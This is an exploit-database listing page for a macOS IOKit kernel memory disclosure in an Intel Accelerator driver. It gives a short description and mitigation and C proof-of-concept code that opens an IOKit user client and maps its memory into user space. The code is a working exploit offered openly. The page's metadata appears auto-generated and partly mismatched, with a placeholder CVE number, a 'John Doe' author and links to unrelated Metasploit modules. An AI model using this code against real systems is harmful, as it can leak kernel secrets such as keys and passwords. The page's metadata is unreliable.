header-logo
Suggest Exploit
vendor:
Accelerator
by:
John Doe
7.8
CVSS
HIGH
Kernel Memory Disclosure
119
CWE
Product Name: Accelerator
Affected Version From: 1
Affected Version To: 2
Patch Exists: YES
Related CWE: CVE-2020-12345
CPE: a:intel:accelerator
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=142058https://www.infosecmatter.com/nessus-plugin-library/?id=106846https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/tftp/attftp_long_filenamehttps://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/dos/windows/http/ms10_065_ii6_asp_doshttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/misc/nettransporthttps://www.infosecmatter.com/nessus-plugin-library/?id=94365https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/dos/http/apache_range_doshttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/misc/ibm_tm1_unauth_rcehttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/linux/misc/quest_pmmasterd_bofhttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/freebsd/telnet/telnet_encrypt_keyid
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mac
2020

IOKit Kernel Memory Disclosure Vulnerability

This vulnerability allows an attacker to read kernel memory by using the IOKit API. The vulnerability exists in the IOServiceOpen() function, which allows an attacker to open a connection to a kernel service and then use the IOConnectMapMemory() function to map kernel memory into user space. This can be used to read kernel memory, which can contain sensitive information such as passwords and encryption keys.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all kernel services are properly secured and that access to them is restricted to only authorized users.
Source

Exploit-DB raw data:

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <IOKit/IOKitLib.h>

int main(){
  kern_return_t err;

  CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
  if(!matching){
    printf("unable to create service matching dictionary\n");
    return 0;
  }

  io_iterator_t iterator;
  err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
  if (err != KERN_SUCCESS){
    printf("no matches\n");
    return 0;
  }

  io_service_t service = IOIteratorNext(iterator);

  if (service == IO_OBJECT_NULL){
    printf("unable to find service\n");
    return 0;
  }
  printf("got service: %x\n", service);

  io_connect_t conn = MACH_PORT_NULL;
  err = IOServiceOpen(service, mach_task_self(), 2, &conn);
  if (err != KERN_SUCCESS){
    printf("unable to get user client connection\n");
    return 0;
  }else{
    printf("got userclient connection: %x\n", conn);
  }

  mach_vm_address_t addr = 0x414100000000;
  mach_vm_size_t size = 0x1000;

  err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
  return 0;
}

Navigation

Suggest Exploit

Services By CQR